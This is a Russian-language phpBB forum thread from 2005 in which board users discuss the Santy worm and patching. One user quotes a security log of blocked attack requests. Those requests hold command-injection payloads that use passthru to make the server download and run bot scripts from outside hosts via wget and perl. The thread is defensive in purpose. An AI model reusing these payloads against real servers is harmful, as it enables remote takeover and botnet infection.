Список форумов Зеркало f-tale Зеркало f-tale
Рукописи не горят
 
 FAQFAQ   ПоискПоиск   ПользователиПользователи   ГруппыГруппы   РегистрацияРегистрация 
 ПрофильПрофиль   Войти и проверить личные сообщенияВойти и проверить личные сообщения   ВходВход 

Santy Wurm nutzt Schwachstelle in phpBB aus

 
Начать новую тему   Ответить на тему    Список форумов Зеркало f-tale -> Доска объявлений
Предыдущая тема :: Следующая тема  
Автор Сообщение
oldDad
Дэд и всё.


Зарегистрирован: 20.06.2011
Сообщения: 3200

СообщениеДобавлено: Сб Янв 08, 2005 20:28    Заголовок сообщения: Santy Wurm nutzt Schwachstelle in phpBB aus Ответить с цитатой

Иван, сделай пожалуйста заплатку!

http://cert.uni-stuttgart.de/ticker/article.php?mid=1233
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
oldDad
Дэд и всё.


Зарегистрирован: 20.06.2011
Сообщения: 3200

СообщениеДобавлено: Вс Янв 09, 2005 21:26    Заголовок сообщения: Ответить с цитатой

Правильно.
Новая версия всяко лучше.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Ivan
Человек из Кемерова


Зарегистрирован: 20.06.2011
Сообщения: 746

СообщениеДобавлено: Вс Янв 09, 2005 21:35    Заголовок сообщения: Ответить с цитатой

Так это старая заплатка, у меня с осени пришита...
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
oldDad
Дэд и всё.


Зарегистрирован: 20.06.2011
Сообщения: 3200

СообщениеДобавлено: Вс Янв 09, 2005 21:37    Заголовок сообщения: Ответить с цитатой

Тогда я вообще не пойму, в чём фишка. Чего все именно сейчас вдруг всполошились? Что, червь только сейчас появился, что ли?
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Ivan
Человек из Кемерова


Зарегистрирован: 20.06.2011
Сообщения: 746

СообщениеДобавлено: Вс Янв 09, 2005 23:00    Заголовок сообщения: Ответить с цитатой

Наверное...
Но у меня это место в коде было выправлено уже. Уже давно, я и не помню когда пачил...
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
oldDad
Дэд и всё.


Зарегистрирован: 20.06.2011
Сообщения: 3200

СообщениеДобавлено: Пн Янв 10, 2005 13:24    Заголовок сообщения: Ответить с цитатой

Я почитал. Действительно, до сих пор случаев поражения не было, только 21.12 появились.

А вот есть ещё одна бяка:

Цитата:
CBACK CrackerTracker Logfile

1105335247,100105,212.112.233.130,/phpBB2/viewtopic.php?t=577&rush=echo%20_START_%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527\';,LWP::Simple/5.48
1105335303,100105,216.10.13.18,/phpBB2/viewtopic.php?t=577&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';,LWP::Simple/5.65
1105335319,100105,217.172.224.20,/phpBB2/viewtopic.php?t=577&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';,LWP::Simple/5.79
1105335345,100105,212.112.233.130,/phpBB2/viewtopic.php?t=577&rush=echo%20_START_%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527\';,LWP::Simple/5.48
---- ещё много....

1105359618,100105,65.75.179.110,/phpBB2/viewtopic.php?t=327&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\';,LWP::Simple/5.803
1105359626,100105,69.44.153.50,/phpBB2/viewtopic.php?t=577&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527



Каково? Только не ходи по этим ссылкам, там ботва.

Это мой CrackerTracker выловил и отшил. А сколько ещё фигни всякой бродит.....
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Ivan
Человек из Кемерова


Зарегистрирован: 20.06.2011
Сообщения: 746

СообщениеДобавлено: Вт Янв 11, 2005 9:45    Заголовок сообщения: Ответить с цитатой

А че это за байда, черви что-ли?
Там и ип-адресочки кажется есть...
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
oldDad
Дэд и всё.


Зарегистрирован: 20.06.2011
Сообщения: 3200

СообщениеДобавлено: Вт Янв 11, 2005 9:52    Заголовок сообщения: Ответить с цитатой

Это шпионы:

LWP::Simple

А по адресочкам этим зловредные боты живут.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Ivan
Человек из Кемерова


Зарегистрирован: 20.06.2011
Сообщения: 746

СообщениеДобавлено: Вт Янв 11, 2005 10:00    Заголовок сообщения: Ответить с цитатой

Вот ведь сцуки беспокойные...

:maniac:
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Показать сообщения:   
Начать новую тему   Ответить на тему    Список форумов Зеркало f-tale -> Доска объявлений Часовой пояс: GMT + 1
Страница 1 из 1

 
Перейти:  
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах


Powered by phpBB © 2001, 2005 phpBB Group
Русская поддержка phpBB